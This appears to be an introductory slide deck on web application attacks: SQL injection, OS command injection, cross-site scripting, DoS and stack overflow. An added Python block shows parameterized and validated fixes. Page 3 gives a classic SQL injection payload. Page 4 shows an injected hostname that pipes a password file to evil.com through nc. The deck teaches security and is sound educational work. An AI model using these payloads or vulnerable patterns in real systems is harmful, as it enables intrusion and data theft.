Web application attack Presentation


Page 1: Web application attack Presentation

Web Application Attack

Nguyễn Kiều Khoa

Page 2: Web application attack Presentation

What is a web application?

- A web application or web app is any software that runs in a web browser. It is created in a browser-supported programming language (such as the combination of JavaScript, HTML and CSS) and relies on a web browser to render the application.

http://en.wikipedia.org/wiki/Web_application

Page 3: Web application attack Presentation

1. Injection (SQL Injection)

db.ExecuteReader("select * from users where name='" + Request["user"] + "' and password='" + Request["password"] + "'");

- Suppose the user parameter of the request is …' or '1'='1

- Then the query we execute is … (note that and has precedence over or)

select * from users where name='' or '1'='1' and password='whatever'

Page 4: Web application attack Presentation

1. Injection (OS Command)

- Suppose we're too lazy to perform a DNS lookup ourselves, so we resort to the following:

system("nslookup " + Request["hostname"]);

- Suppose the hostname parameter is …

foo || cat /etc/password | nc evil.com

- Then we end up sending the password file to evil.com.
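As an added example (not code from the slides), the two vulnerable constructions above beside their fixes in Python: string-built SQL versus a parameterized query, run against a constructed in-memory SQLite table, and a hostname check that hands nslookup an argument list instead of a shell string. The sample rows, the regex and the function names are assumptions of the example.

```python
import re
import sqlite3

# Constructed sample users for the demo; the names and passwords are made up.
USERS = [("alice", "s3cret"), ("bob", "whatever")]

def make_db():
    """In-memory users table holding the constructed rows above."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (name text, password text)")
    conn.executemany("insert into users values (?, ?)", USERS)
    return conn

def build_query_unsafe(user, password):
    """String concatenation, the same construction as the slide's
    db.ExecuteReader call; attacker text becomes part of the SQL."""
    return ("select * from users where name='" + user
            + "' and password='" + password + "'")

def login_unsafe(conn, user, password):
    """Runs the concatenated query. Because AND binds tighter than OR, the
    slide's payload selects every row whose password is 'whatever'."""
    return conn.execute(build_query_unsafe(user, password)).fetchall()

def login_safe(conn, user, password):
    """Parameterized query: the driver passes the values separately, so a
    quote in the input is data and cannot change the statement."""
    sql = "select * from users where name=? and password=?"
    return conn.execute(sql, (user, password)).fetchall()

# Hostname grammar (letters, digits, hyphens, dots); a shell metacharacter
# such as '|' or ';' can never pass this check.
HOSTNAME_RE = re.compile(
    r"^[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])?)*$")

def lookup_argv(hostname):
    """Validates the hostname and returns an argv list for subprocess.run
    (no shell), the fix for the slide's system("nslookup " + hostname)."""
    if len(hostname) > 253 or not HOSTNAME_RE.match(hostname):
        raise ValueError("invalid hostname: %r" % hostname)
    return ["nslookup", hostname]

if __name__ == "__main__":
    db = make_db()
    payload = "' or '1'='1"  # the user parameter from the slide
    print(build_query_unsafe(payload, "whatever"))
    print("unsafe:", login_unsafe(db, payload, "whatever"))
    print("safe:  ", login_safe(db, payload, "whatever"))
    print(lookup_argv("example.com"))
```

Pass the returned list to subprocess.run without shell=True; the hostname then reaches nslookup as a single argument and is never parsed by a shell.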

Page 5: Web application attack Presentation

2. Cross-Site Scripting

- Injecting JavaScript into pages viewed by other users.

Page 6: Web application attack Presentation

3. DoS and DDoS

- A denial-of-service (DoS) or distributed denial-of-service (DDoS) attack is an attempt to make a machine or network resource unavailable to its intended users.

http://en.wikipedia.org/wiki/Denial-of-service_attack

Page 7: Web application attack Presentation

4. Stack Overflow

- A stack buffer overflow or stack buffer overrun occurs when a program writes to a memory address on the program's call stack outside of the intended data structure, which is usually a fixed-length buffer.

Page 8: Web application attack Presentation

Q&A